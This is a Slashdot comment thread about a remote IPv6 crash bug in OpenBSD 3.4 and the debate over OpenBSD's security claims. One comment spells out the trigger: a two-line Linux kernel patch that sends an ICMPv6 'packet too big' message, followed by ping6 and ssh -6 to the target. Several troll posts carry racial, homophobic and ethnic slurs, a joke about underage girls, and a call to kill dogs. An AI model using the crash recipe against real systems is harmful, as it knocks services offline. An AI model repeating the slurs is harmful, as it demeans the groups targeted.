Remotely Crash OpenBSD

*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.

GNAA confirms: BSD is Dying

[W32.Klez.A]

GNAA confirms: BSD is dying
"Do not stand at my hard disk and forever weep.
I am not there; I do not sleep.
I am a thousand winds that blow.
I am the diamond glints on snow.
I am the sunlight on ripened grain.
I am the gentle autumn's rain.
When you reboot in the morning's hush
I am the swift uplifting rush
Of quiet birds in circled flight.
I am the soft stars that shine at night.
Do not stand at my hard disk and forever cry.
I am not there. "


GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the first organization which
gathers GAY NIGGERS from all over America and abroad for one common goal - being GAY NIGGERS.

__vowov_ __vv___v_ ______vov_ ______vov__
_vow_wov _vow__wov _____vowov _____vowov_
_vow____ _voww_wov ____vowowv ____vowowv_
_vow_wov _vow_wwov ___vow_wov ___vow_wov_
_vow_wov _vow__wov __vow__wov __vow__wov_
__vowov_ _vow__wov _vow___wov _vow___wov_

_____GAY NIGGER ASSOCIATION of AMERICA_____

BE NIGGER!
BE GAY!
JOIN THE GNAA!

GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the fastest-growing GAY NIGGER community with THOUSANDS of members all over United States of America. You, too, can be a part of GNAA if you join today!

Why not? It's quick and easy - only 3 simple steps!

First, you have to obtain a copy of GAY NIGGERS FROM OUTER SPACE THE MOVIE and watch it. (Click Here to download the ~280MB MPEG off of BitTorrent)

Second, you need to succeed in posting a GNAA "first post" on slashdot.org, a popular "news for trolls" website

Third, you need to join the official GNAA irc channel #GNAA on EFNet, and apply for membership.
Talk to one of the ops or any of the other members in the channel to sign up today!

Fourth, remind Lindsay Felton about Batman touching my junk liberally.

If you are having trouble locating #GNAA, the official GAY NIGGER ASSOCIATION OF AMERICA irc channel, you might be on a wrong irc network. The correct network is EFNet, and you can connect to irc.foxlink.net or irc.choopa.net as one of the EFNet servers. If these do not work, use irc.efnet.net.
If you do not have an IRC client handy, you are free to use the GNAA Java IRC client by clicking here.

If you have mod points and would like to support GNAA, please moderate this post up.

This post by GNAA member Lysol, another soul proud of his nigger fag heritage.

Re:GNAA confirms: BSD is Dying

Awesome timing, man. But you should have posted some pictures of that hot BSD chick...

Re:GNAA confirms: BSD is Dying

Its illegal to post pics of underage girls, sorry.

Re:GNAA confirms: BSD is Dying

Its illegal to post pics of underage girls

Mmmm... Laika...

Oh well...

[Seoulstriker]

I think it's time to upgrade to windows.

Re:Oh well...

[justsomebody]

Upgrade what,... maybe... your stress level???

Re:Oh well...

HAHAH! THAT'S SO NOT FUNNY!

Re:Oh well...

[justsomebody]

Just as you CAPS!

Re:Oh well...

Ping of death, anybody?

Re:Oh well...

[Rosco+P.+Coltrane]

I think it's time to upgrade to windows.

Didn't Microsoft swipe "their" XP TCP/IP stack from BSD? It'd be interesting to know if Windows could be crashed using the same exploit.

Re:Oh well...

[cant_get_a_good_nick]

The original NT TCP/IP stack was from BSD. They've sinced ripped it out and put in their own.

Re:Oh well...

[phoenix_rizzen]

Nope. Microsft bought the STREAMS implementation of TCP/IP from Spyder, Inc.

The only TCP/IP-related bits MS took from BSD were a few utilities like ftp.exe and telnet.exe. The actual TCP/IP stack is not related to BSD in any way.

Re:Oh well...

The release was titled "Remote openbsd crash with ip6, yet still openbsd much better than windows".

Re:Oh well...

[NanoGator]

"Upgrade what,... maybe... your stress level???"

Vice City relieves that.

Re:Oh well...

[Anonvmous+Coward]

"Vice City relieves that."

Until you read the newspaper the following morning.

Re:Oh well...

[phoxix]

Nope. Microsft bought the STREAMS implementation of TCP/IP from Spyder, Inc.

I don't mean to contest your statements

But I was searching on google for the above and found nothing

Have any links on this ?

Sunny Dubey

Re:Oh well...

[irokitt]

When I googled, some of the stuff I got was "I Love You" related.Wierd, huh?

Re:Oh well...

then why do the header files for the networking related parts of MS Visual studio say copyright Regents of University of California at the top of them?

Re:Oh well...

Not only that, but the winsock API almost exactly mirrors Unix. Microsoft even uses the word BSD several times in the documentation.

Re:Oh well...

[@madeus]

No, but I've got the developer source CD's here and can confirm than from looking at them myself if that helps any.

Sorry can't back it up with URLs though :)

Re:Oh well...

[kl76]

Who the heck is Spyder Inc? The TCP/IP stack in NT 3.1 was the STREAMS-based SpiderTCP 6 (IIRC) from Spider Systems Ltd. (I used to work for them). This in turn used some BSD code. This stack was replaced in NT 3.5, with a stack alledgedly written from scratch at Microsoft according to this .

Re:Oh well...

[HalliS]

• I think it's time to upgrade to windows.

Wrong. The openbsd people obviously included this "crash feature" just so that windows people could feel at home with OpenBSD. I think it's time for Windows folks to switch to OpenBSD.

Re:Oh well...

If you used to work at spider, could you explain why the serial ports on this spiderport terminal server are so damned close together? Had to use a hacksaw today to get two cables to fit side by side. Cute bit of kit though, in any case.

Re:Oh well...

[kl76]

Sorry, wasn't really involved on the hardware side back then...ask me a question about the SpiderPort firmware instead 8-)

So,

How do them apples taste now?

Re:So,

Troll? This seems to be exactly on topic...

THIS CONFIRMS ALL

*BSD IS DYING

Just Login from a Windows Box!

Extra point if you use Exploder!

Ya!

Propz to GNAA

[ed. note: in the following text, former FreeBSD developer Mike Smith gives his reasons for abandoning FreeBSD] When I stood for election to the FreeBSD core team nearly two years ago, many of you will recall that it was after a long series of debates during which I maintained that too much organisation, too many rules and too much formality would be a bad thing for the project. Today, as I read the latest discussions on the future of the FreeBSD project, I see the same problem; a few new faces and many of the old going over the same tired arguments and suggesting variations on the same worthless schemes. Frankly I'm sick of it. FreeBSD used to be fun. It used to be about doing things the right way. It used to be something that you could sink your teeth into when the mundane chores of programming for a living got you down. It was something cool and exciting; a way to spend your spare time on an endeavour you loved that was at the same time wholesome and worthwhile. It's not anymore. It's about bylaws and committees and reports and milestones, telling others what to do and doing what you're told. It's about who can rant the longest or shout the loudest or mislead the most people into a bloc in order to legitimise doing what they think is best. Individuals notwithstanding, the project as a whole has lost track of where it's going, and has instead become obsessed with process and mechanics. So I'm leaving core. I don't want to feel like I should be "doing something" about a project that has lost interest in having something done for it. I don't have the energy to fight what has clearly become a losing battle; I have a life to live and a job to keep, and I won't achieve any of the goals I personally consider worthwhile if I remain obligated to care for the project. Discussion I'm sure that I've offended some people already; I'm sure that by the time I'm done here, I'll have offended more. If you feel a need to play to the crowd in your replies rather than make a sincere effort to address the problems I'm discussing here, please do us the courtesy of playing your politics openly. From a technical perspective, the project faces a set of challenges that significantly outstrips our ability to deliver. Some of the resources that we need to address these challenges are tied up in the fruitless metadiscussions that have raged since we made the mistake of electing officers. Others have left in disgust, or been driven out by the culture of abuse and distraction that has grown up since then. More may well remain available to recruitment, but while the project is busy infighting our chances for successful outreach are sorely diminished. There's no simple solution to this. For the project to move forward, one or the other of the warring philosophies must win out; either the project returns to its laid-back roots and gets on with the work, or it transforms into a super-organised engineering project and executes a brilliant plan to deliver what, ultimately, we all know we want. Whatever path is chosen, whatever balance is struck, the choosing and the striking are the important parts. The current indecision and endless conflict are incompatible with any sort of progress. Trying to dissect the above is far beyond the scope of any parting shot, no matter how distended. All I can really ask of you all is to let go of the minutiae for a moment and take a look at the big picture. What is the ultimate goal here? How can we get there with as little overhead as possible? How would you like to be treated by your fellow travellers? Shouts To the Slashdot "BSD is dying" crowd - big deal. Death is part of the cycle; take a look at your soft, pallid bodies and consider that right this very moment, parts of you are dying. See? It's not so bad. To the bulk of the FreeBSD committerbase and the developer community at large - keep your eyes on the real goals. It's when you get distracted by the politickers that they sideline you. The tireless work that you perform keeping the system clean and building is what provides the platfo

Re:Propz to GNAA

Sheesh. I enjoy browsing at -1 as much as the next guy, but if you're going to post at -1 at least make it formatted and concise. It's one thing to make a point at -1, it's another entirely just to spout what looks like white noise.

ECFA - better than the GNAA because we do GOOD

PLEASE KILL A DOG - Any dog. Support the Euthenasia for Canus Familiarous Assoc. today to benefit from the FULL BENEFITS of being a FULL TIME ECFA member.

Are you MAD?
Do you HATE DOGS?
Are you a MAD DOG HATER?

If you answered "yes" to any of the above questions, the ECFA is for you! The ECFA is the only animal humane group that supports the MAD KILLING OF DOGS.

Why kill dogs you ask? Because there are just TOO MANY of them. We don't have anything against the species, it's just that they are too overpopulated. Dog lovers from around the world spend LOADS of TIME attempting to save every member of this overcrowded species. To fix this imbalance, the overpopulated animals need to be eliminated. If the dog is not already in a home, or can be adopted in a short period of time... it's time to say goodbye.

Why MAD? Because they are costing us TAX DOLLARS to take care of? Over 100 million dollars is spent in the US each year alone on taking care of wild dogs. The health and safty concerns of this overpopulation are overwhelming. It is time to say goodbye.

We are looking forward to your membership. To join, first get a ECFA "first post" on slashdot.org. Then, give us a holler in our chatroom, #dogs on efnet. Then, simply post a sign outside your humane society for the humane destruction of dogs with euthanasia.

Re:ECFA - better than the GNAA because we do GOOD

Awww, those poor puppies. :(

Crash and burn

and then the devil rises.

Remember Murphy's Law!

[SIG+TR0LL]

Funny how Linux causes this

[ObviousGuy]

You'd think that Linux problems would only affect itself, but apparently it's bad enough to crash BSD boxes as well.

So much for peaceful network coexistence.

Remotely?

[RetroGeek]

require patching a Linux kernel (or rolling your own network stack) to exploit.

So if you patch YOUR kernel and/or roll YOUR own network stack, then you could be vulnerable to a remote attack.

What am I missing here?

Re:Remotely?

[Beolach]

No, in order to perform an attack on an OpenBSD box with this vulnerability you need to patch a Linux Kernel or roll your own network stack.

Re:Remotely?

Yes, the attacker needs to modify their kernel to send out the specific packet (from what I quickly read)

Re:Remotely?

RTFA. you need to patch your kernel in order to EXPLOIT it, not to be exploited.
ps: it's only a 2 line patch to one file.

Re:Remotely?

[chatgris]

I believe that you must roll your own Linux kernel or network stack in order to send the (correct? bad?) commands that cause openBSD's crash to occur.

Re:Remotely?

[Rydian]

Actually you need to patch the linux kernel or write you own network stack to DO the remote attack against an OpenBSD box.

At least that's the way I read it.

Re:Remotely?

[athakur999]

No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.

Re:Remotely?

No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.

Damn. And people say that Windows is insecure. Jeez.

Re:Remotely?

You should read before posting.

Re:Remotely?

[thestarz]

So if you patch YOUR kernel and/or roll YOUR own network stack, then you could be vulnerable to a remote attack.

No, your attacker has to patch his linux kernel or roll his own network stack in order to crash you. You don't have to do a thing. RTFS!

Re:Remotely?

[0racle]

You appear to be missing the whole problem.

This is a problem with OpenBSD's IPv6 implimentation where if you send bad data, it looks like sending something larger then expected, then the kernel will crap out on you.

The rolling your own kernel OR build your wn network stack is whats required for the REMOTE host to send these bad packets to your system and crash it.

On an unrelated note, its a little disturbing to see this as i just rebooted a OBSD 3.3 system to upgrade to 3.4, but then again, I don't run IPv6.

What I would say is most suspect is Theo's reaction "Its just a crash." You would hope someone who started a project to create the worlds most secure OS would actually care there might be a problem.

Re:Remotely?

No, the BSD has to patch the ATTACKERS IPv6 to crash THE packet linux victim ROLL YOUR OWN!

Re:Remotely?

[justsomebody]

Thanks, I feel like I was just promoted to people level.
Damn, and I was just geting used being geek level

Re:Remotely?

I love how the SIXTH person to respond to this post with essentially the same information as the other five gets modded up. How much you wanna bet the posts ahead of his get modded down as Redundant?

Re:Remotely?

[JeffTL]

Well, I guess Theo got hit by the reductionism bug...or perhaps what he means is "At least the system goes down rather than being compromised"

Re:Remotely?

[0racle]

I think what he means is "its just a crash rght now dont bother me untill you can show an exploit and have fixed it." It says right in the article they don't know if it will allow a system to be compromised, and it seems that until someone else checks that, he doesn't care. I was just saying that a crash might not be a crash, but Theo's attitude is a little lax in aproching the situation considering that they say right on bootup to OpenBSD the PROACTIVLY secure unix system. Not all that proactive when you don't take action to actually prevent a problem and just wait for someone to give you step-by-step how to comprimise a system.

Re:Remotely?

[Lord+Kano]

What am I missing here?

Enough good sense to RTFA, or at least properly fake as though you had.

LK

Re:Remotely?

[Richard_at_work]

What would you rather Theo say? "OMG OMG OMG!!! Its a CRASH!!! Oh dear god! Quick, run around like headless chickens!!!!! Someone better get this patched pronto!!" or "Its jsut a crash." and get on with the patching?

Seriously, its getting fixed. You think his reaction would change the pace with which the bug gets fixed?

Re:Remotely?

What am I missing here?

Literacy.

Re:Remotely?

[sqlrob]

And buffer overflows that get data that isn't crafted are "just a crash" as well.

Re:Remotely?

I applaud what Theo de Raadt and company have done and are trying to do. Given the resources someone like M$ has to throw at this sort of thing (and their level of success) compared to the OpenBSD team, they've done amazing work. That being said, if Mr. de Raadt could do an attitude re-adjustment, OpenBSD could gain more of the respect it deserves.

Re:Remotely?

no. you have to patch the attacker's kernel. Then you have to light 6 candles, carefully placing 2 of them on the magnetic poles of the earth..the other 4 candles must be placed inside your rectum for a period of 7 days during which you cannot consume water. This remote crash is gay. You shouldnt have ipv6 enabled on a fucking production box anyway.

Re:Remotely?

Actually you don't need to do any of the candle part at all. You probably loved researching that part though, didn't you Theo?

Re:Remotely?

[Graspee_Leemoor]

I get it now. We leave. You guard the prince. The prince has to patch his kernel.

graspee

Re:Remotely?

I don't see how you'd need to "patch the kernel" or "roll your own network stack" at all. Granted, I don't have a Linux machine available right now and I don't now the inner workings of this exploit, but looking at the "patch" and the two commands issued to carry out the exploit, it looks very much like all you have to do is send an icmp6-packet-too-big to the target (which is trivial with packet sockets in linux and other datalink interfaces in other operating systems, including windows) and then open a tcp connection.

case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

then:
ping6 openbsd
ssh -6 openbsd

The patch just sends an icmp6-packet-too-big when it recieves an echo reply, which it gets from the target after pinging it, and ssh of course just opens a tcp connection.

Does this count?

[DNAspark99]

Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?

Re:Does this count?

[inertia187]

I don't think the IPv6 install is the default. Even if it is, 'it's just a crash' not a remote hole. So, yes they can still boast.

Re:Does this count?

[subk]

Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?

They'll just lower the number of years to the amount since the first one.

Re:Does this count?

Interesting question. Even if it was proved exploitable, I'm not sure an IP6 issue can truely count for anything yet.....

Re:Does this count?

[0racle]

Well no, at the moment its "just a crash" because no ones looked into it to see if it will allow code to be executed, but yes I dont believe IPv6 is in the default install.

Re:Does this count?

[Richard_at_work]

IPv6 is available in the base install, but you have to actually have an IPv6 address assigned that people can get to to exploit this issue. Its really a non issue for the 99% of people running OpenBSD out there, but for some, like myself, its time to upgrade.

Re:Does this count?

[sporty]

It's not a hole. A hole would imply gaining access. This is just a DoS attack.

Re:Does this count?

[timeOday]

Guess it depends on how you define "hole."

Personally I don't like random people crashing my servers, so I'd call it a hole!

Re:Does this count?

A hole would imply gaining access.

No, A hole would imply our president.

Re:Does this count?

[cscx]

Yes, the OpenBSD box on my cable modem fetches an IPv6 address.

Re:Does this count?

[FsG]

Although the webpage still says 1 hole, it's actually been 2 holes for quite a while - since OpenSSH was exploited in Sept 2003.

Re:Does this count?

[nocomment]

Although the webpage still says 1 hole, it's actually been 2 holes for quite a while - since OpenSSH was exploited in Sept 2003.

IIRC that was because the next version was already done.

Re:Does this count?

[Frank+T.+Lofaro+Jr.]

Most crashes caused by malice are due to data being overwritten.
Most situations involving data being overwritten allow malicious control, not just crashes.

There very well may be a possible kernel level exploit (which is even worse than root level, since it can override security level settings - it can do anything).

Re:Does this count?

So was it a hole in the default install or not?

(I strongly suspect that the same person does Security PR for both Microsoft and OpenBSD.)

Re:Does this count?

[EvilAlien]

Does the definition of "just a DoS attack" include the acknowledgement that a system with no availability is useless? Or does OpenBSD's stated designs only include the goal of no unauthorized access without any pretentions of "features", "usefulness", or "availability"?

Re:Does this count?

what are you talking about? Just yesterday open bsd had a major hole... Hell windows has been stable longer... ;-)

Re:Does this count?

[Nimrangul]

I recall this vaguely, that was only able to crash sshd on an recent OpenBSD box, it was exploitable on other platforms (though older OpenBSDs would have been equally vulnerable).

Not only that, but for those blaming OpenSSH for making bad code that created the exploit, it was one that had been present since ossh (the free ssh implementation the OpenBSD team used to make OpenSSH).

Re:Does this count?

[kkenn]

There have actually been a number of local and remote root holes in the default install of OpenBSD during that time frame..the only sense in which their claim is true is that they don't count root holes except in the head of the CVS tree. If a release from a year ago had the hole, but the current tree does not, they don't count it.

For example, a couple of years ago there was a telnetd exploit discovered after OpenBSD had disabled telnetd by default in OpenBSD-current, but a recent prior release had shipped with telnetd enabled. That allowed them to rationalize not counting it as a remote hole. There are a number of other similar examples.

Re:Does this count?

now what, did you say, was your server's address again?

Re:Does this count?

[Breakfast+Pants]

Shut up. Of course thats not what their designs want. Its just that the statement "no remote hold in the default .. blah blah" is still true. Thats all the parent said. Of course this still a bad thing; but don't act like anyone said it wasn't.

Re:Does this count?

Not Flamebait. Presiment George Butch of the Untied Status of 'Merka IS an A-hole.

And he's a fuckwad too.

And, No. I'm not the original AC.

Re:Does this count?

A denial of service is not an "exploit" (i.e. gaining of root priviliges), though, is it?

Re:Does this count?

Upgrade to Stable via patching yes.

Re:Does this count?

Which means they are correct, since, they define what openbsd is, ie current release+patches.

Re:Does this count?

[edhall]

Just because they fixed it before it was reported doesn't mean it never existed -- or that it was never quietly exploited. This sort of semantic game detracts from the hard work that goes into OpenBSD. It may be no worse than the sort of word games used to market other software, but in an area like security where trust is paramount it needlessly raises suspicion.

-Ed

Re:Does this count?

Kris, you're jealous because the last two FreeBSD releases have been a fucking piece of shit.

Troll Glass

Re:Does this count?

[Frizzle+Fry]

If a release from a year ago had the hole, but the current tree does not, they don't count it.

This doesn't make sense to me. If the release from a year ago had a hole, then you can't claim a record of releasing software with no holes. You can claim to have no known holes now, but how you can you say "We have had no holes for the last seven years" and then say "We didn't include the hole from a year ago in that count because it no longer exists".

In other words, if they "don't count root holes except in the head of the CVS tree", wasn't the telnet hole you cite once at the head of that tree? And wasn't that in the last seven years? So how can it not count?

Re:Does this count?

[mph]

Does the definition of "just a DoS attack" include the acknowledgement that a system with no availability is useless? Or does OpenBSD's stated designs only include the goal of no unauthorized access without any pretentions of "features", "usefulness", or "availability"?

Here, I'll give you a choice: Do you want me to crash your system, or do you want me to have root access (possibly without you ever knowing about it)?

Most people would agree that being rooted is worse than being crashed. That doesn't mean being crashed is good, or that we shouldn't try to prevent it, but in our millions of years of evolution, most of the human race has evolved the ability to classify things more finely than "good" or "bad." We can distinguish degrees of good or bad.

You are welcome to join us when you catch up.

Re:Does this count?

It does to me because that's how it's always been done with OBSD. Look, when someone says something, you have the opinion and right to look at the veracity or underlying premise of -what- is being said. It's been pretty clear for a couple of years what OBSD's standard for that statement is.

iow, if it doesn't make sense to you, that's completely fine. But it's not like OBSD is being hush hush, nudge wink with how they come up with their count.

imnsho, at least they have a standard or policy or rules or what have you for determining their remote hole count. Of all other OS makers, groups, and mfgs out there, I don't know of one other that keeps count, has a public statement of that count, gives publicly accessible rules for determining that count, and follows those rules. Linux sure doesn't--the sheer variation, number of distros, etc. has no one keeping a firm count. OBSD is more limited and applies it to their default install.

Personally, I like OBSD's claim and think it's valid, both in the areas of valid to make and valid as valuable to the OS user.

Compare them to other OS makers. When MS releases a security patch and months later, Melissa or some other virus comes along and exploits it because people were too lazy to plug up their systems, I don't say "That's MS's fault." I consider that on incompetent or lazy users. Now, I realize many here on this forum will blame MS, and they do get boatloads of blame, but they also patched the damn thing. Sometimes with these patches, the patch itself reveals the error and makes it widely known; virus or exploit writers then go about taking advantage of that, comparing differences between a patched and unpatched systems.

When Samba had that "caught in the wild" ecurity issue last year, I don't say "well that's been in the wild 5 years" and then count that one bug multiple times against them for every Samba version released since then, or every update. Why not? Because that would be ludicrous. Likewise with OBSD, I don't say "well, that was out there since release X when Y code was added, hence that counts for every release since X until current as a bug".

Note with the last, this also reveals that people and communities innately have their own idea or standards on how "bugs" are counted against to versions or releases. Most people would say Samba's bug they caught in the wild counts as 1 bug. And they'd be right. Not several via very Samba release since that code was written.

Same with OBSD. They have a standard, they found an issue, so does it apply to their policy for determining that count? No. Count doesn't go up.

Re:Does this count?

[irc.goatse.cx+troll]

They never could, its always been a marketing lie. Theo would rather hide things from his users than admit vulns, as the only thing that matters to him is his ego. See the old ntalkd vuln, this vuln, or the local crash that you still need to get a patch off the obsd mailing list because theo won't make an announcement.

Re:Does this count?

> It's not a hole. A hole would imply gaining access. This is just a DoS attack.

You may or may not be aware of this, but a DOS on an authoritive DNS is often a part of trying to take over a domain remotely. A crash is very helpfull for achieving this, and as such can be a major security issue.

FUCK ALL ITALIANS!

with their DEGO moustaches and GREASY hair!

Re:FUCK ALL ITALIANS!

It's "dago", you ignorant slice of turd.

Re:FUCK ALL ITALIANS!

If it weren't for Italians you wouldn't have pizza, you damn twit.

Funny that...

[Fnkmaster]

Fixing a bug in OpenBSD requires patching a Linux kernel? What will they think of next?! Installing Outlook for fix a Solaris root exploit?

Re:Funny that...

RTFA. You need to patch the linux kernel to get it's network stack to send out the specific packet to crash openbsd.

Re:Funny that...

Exploiting the bug requires patching the Linux kernel.

Re:Funny that...

What part of "to exploit" don't you understand?

Re:Funny that...

I believe that EXPLOITING (not patching) the vuln. requires patching you network stack (the post just assumes you are running Linux in true /. form)

Re:Funny that...

[__past__]

It's not as there hasn't been an Outlook (Express) version for Solaris, you know? I still sometimes use IE 5.0 on my Sun Ultra5, mostly for quick testing.

(On the other hand, as everybody knows, IE is an integral part of windows and could never work on Solaris, HP-UX or Mac OS, just as it would be impossible to create a Windows version without IE, like WinXP-PE)

Re:Funny that...

[maxwell+demon]

However, I guess patching a BSD kernel should work as well :-)

Re:Funny that...

[Fnkmaster]

Okay, okay, I misread the post. You can all stop flaming me now. I thought it said it required patching the Linux kernel _to fix_ rather than to exploit. In any case, it was only meant in jest, there was no need whatsoever for the mod slamming and flamefest.

Re:Funny that...

[obirt]

Um, maybe you haven't seen that Microsoft has been making IE and Outlook Express for Mac since version 3 of Internet Explorer and Outlook Express 4.5. IE is also included in MacOS X installs.

Re:Funny that...

[Coward+the+Anonymous]

But the Mac port of IE is a different codebase.

Here is an MSDN article from 1998 that tells how MS did it.
http://msdn.microsoft.com/archive/default.asp?ur l= /archive/en-us/dnarwbgen/html/msdn_unixwin32.asp

They used MainSoft's Win32 layer for Unix.

this is bullshit

mod -1 for being a troll post, openBSD is alive and well... and its not the linux kernel, its the BSD kernel you dumbshit.

Re:this is bullshit

The Linux kernel in question belongs to the attacker, you dumbshit.

Re:this is bullshit

But the Linux kernel is what needs to be patched in order to exploit the OpenBSD kernel. A program running on "out of the box" Linux, can't implement the attack.

Re:this is bullshit

[NixLuver]

He was talking about having to modify a linux kernel in order to generate the traffic to crash the BSD kernel...

Re:this is bullshit

[endx7]

mod -1 for being a troll post, openBSD is alive and well... and its not the linux kernel, its the BSD kernel you dumbshit.

Maybe you don't understand, but there has to be an attacker. You have to have a specific modification in the linux kernel of the linux machine (attacking machine) to successfully attack the openbsd machine (victem). Probably you could set up a FreeBSD machine, or even another OpenBSD machine to do the attack. Just a linux machine was used to attack in the example.

Did you even RTFA?

Re:this is bullshit

[Rick+and+Roll]

I have a modifier to add six points for troll posts, so this actually gets *modded up* to five points on my computer. And at least you got what you asked for. A lot of people think they're trolling and ask for a troll mod, but they get flamebait. Dumbasses.

Double standards?

[Threni]

I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

Re:Double standards?

if someone from Microsoft stated "It's just a crash"

Yeah, but on Windows, how can you tell the difference?

(Admit it, you asked for it)

Re:Double standards?

[jwthompson2]

"It's Just a crash" is among the dumbest things anyone could say about a bug. Not quite as bad as "It's just a remote root exploit" but very disturbing none the less. The only thing that seems to offer any reassurance is that it requires a patched kernel or custom stack to exploit but a person bent on bringing down a system *could* do these things without too much trouble I would think. My question is for a serious cracker wouldn't taking down a system in a manner like this be much more inviting if all they want to do is bring a system down?

Re:Double standards?

[Temporal+Outcast]

How do you know its not sarcasm?

To me it sounds just that. Although I agree that there are instances of anti-MS bias, this is not one.

Besides, the reason MS gets made fun of is only because there's always "just a crash" - the reason OpenBSD doesn't get made fun of is because its so rare that it ever happens.

*shrug*

Re:Double standards?

[Karamchand]

Obviously you don't know anything ever written by Mr. de Raadt. You know, he says things you'd count as "dumb" all the time. Strange things, indeed. ;-)
Regards

Re:Double standards?

[gid13]

If Microsoft had few enough exploits that they had a security record worth protecting by saying "it's just a crash", perhaps the editors wouldn't feel it necessary to be so sarcastic?

Especially given that Microsoft is a company that charges for their product, where OpenBSD is free.

Re:Double standards?

Especially given that Microsoft is a company that charges for their product, where OpenBSD is free.

ahh, playing the ever-popular price card. It is a moronic thing to do. If you want to play with the big boys and gloat over the fact that your shiny OS is free, you cannot then hide behind its being free to explain its limitations. It is two-faced hypocrisy at its finest.

Re:Double standards?

[gid13]

I'm trying to play two cards. One is price, one is security.

Unless you're claiming that MS is significantly more secure than OpenBSD, your point fails completely.

And if you ARE claiming that, you may wish to read up on the subject.

Re:Double standards?

[negacao]

oh, there was definetly sarcasm on the editors part..

or d'ya miss it? ;)

Re:Double standards?

[c]

I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

Yes, but Microsoft lacks credibility when it comes to security.

If William G Gates personally presented me with a signed and notarized certificate saying "It's just a crash" I'd get still get a second opinion. After making sure I still had my wallet.

c.

Re:Double standards?

[spitzak]

He IS being sarcastic. If this was a Microsoft bug and they said "It's just a crash" it surely would be quoted exactly the same way, because it is a silly statement. Let's see:

*no comment* writes "If you are IPv6 on WinXP, it might be time to upgrade to Linux (just kidding). There is, however, a way to crash WinXP with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Bill Gates, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.

Okay, now that the wording has been changed to Microsoft, doesn't it suddenly look like a typical rabid-anti-Microsoft Slashdot article? You are so blinded by the belief that everything is anti-Microsoft that you cannot even see people being sarcastic about anything not Microsoft!

Re:Double standards?

[Tony-A]

you cannot then hide behind its being free to explain its limitations.

Limitations?
If over a span of several months/years the only way to take down a Microsoft Windows machine was something as esoteric as specially built IPv6 stack, you'd have a point. Seems like OpenBSD is in much better shape to play with the big boys than Microsoft.

Noticed this awhile ago...

I noticed this awhile ago. To fix the problem, it is believed that openbsd current is not vulnerable.

It's ok...

Noone important uses BSD anyways...

patching a Linux kernel?

[DaHat]

Why would you patch a Linux kernal for a BSD problem? That's like patching Windows due to a linux problem.

Re:patching a Linux kernel?

[Roofus]

They are saying that to exploit would require a patch to the Linux kernel.

I like your way better though!

Re:patching a Linux kernel?

You patch linux in order to exploit the problem on bsd.

Re:patching a Linux kernel?

Jesus. Can nobody actually READ the entire story and then understand it before rushing to post? To quote: "but it does require patching a Linux kernel (or rolling your own network stack) to exploit." i.e. You have to patch your Linux kernel to generate the IPv6 packet OR write your own network stack to generate the IPv6 packet. This packet when sent to a vulnerable OpenBSD machine will crash it.

Re:patching a Linux kernel?

[name773]

Why would you patch a Linux kernal for a BSD problem?

to exploit it.

Re:patching a Linux kernel?

I know you are, but what am I?

Patch for production systems?

[agentZ]

I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current. There's no patch or even a mention of this problem on the errata page.

What's a sane admin to do?

Re:Patch for production systems?

Are you on an IP6 network? I'm betting you aren't....
But if you are just wait a little while for the fix.

Re:Patch for production systems?

Since there are legions of people recompiling their TCP stacks right now to crash your OpenBSD boxes, you may have to switch to Linux, since Linux has proven to be much more secure in a networked environment that OpenBSD.

Or you can wait... it seems likely a fix will come to -stable.

Re:Patch for production systems?

[Richard_at_work]

Give it a little time. THey usually patch -current first to test it out, then backport the patches to -stable. Patching -current first saves time in the long run, in cases like this where its not really a MS level issue :) IF it was more serious, -stable would get the patch first, and then it would be ported into -current.

Re:Patch for production systems?

Run FreeBSD?

Re:Patch for production systems?

Uhm. RTF mailing lists for the system(s) you're running?! Patch it yourself?!

Re:Patch for production systems?

It's been patched in -current for 3 days now.

Re:Patch for production systems?

[Ryvar]

Do what I did last night before I even knew about this - comment IPV6 completely out of your kernel entirely for effiency's sake.

One of the reasons OpenBSD tends to be more secure is because it ships with *almost* everything off. However, there's a solid 10+ default user accounts, 3-4 default services (sshd, sendmail, inetd/portmap), and 75+ kernal/device options you should remove/recompile out upon installation (this is all assuming your only purpose is to create an x86-based router).

Yes, you'll need to muck about with /etc/mtree/special and /var/cron/tabs a bit to keep everything from whining to syslog constantly, but every unnecessary thing removed is a potential exploit avoided.

--Ryv

Re:Patch for production systems?

[ch-chuck]

3-4 default services (sshd, sendmail

OBSD ships with sendmail accepting connections on localhost only - the first thing I always do is install the postfix package before accepting mail from the outside world.

Re:Patch for production systems?

[Ryvar]

Smart.

If I setup the system for mail - which I don't do for a simple firewall - I also use Postfix. Only other alternative is qmail and DJB's stuff is just too much of a PITA/non-standard.

--Ryv

Re:Patch for production systems?

[Triumph+The+Insult+C]

since when does ripping stuff out of the kernel make it any more efficient?

oh, and good luck getting support from openbsd for your slim kernel

Re:Patch for production systems?

[toughluck]

Just did an OBSD 3.4 install today. The default services were: sshd, sendmail(only for localhost connections), inetd, daytime, time, auth. Only ports showing as open when nmap'd from another box were 13/tcp, 22/tcp, 37/tcp, 113/tcp

Re:Patch for production systems?

[mnmn]

I do all these, simplify the init scripts and other simplification stuff just for the heck of it. Its like buying a car, you'd want to personalize it with a few trinkets here and there.

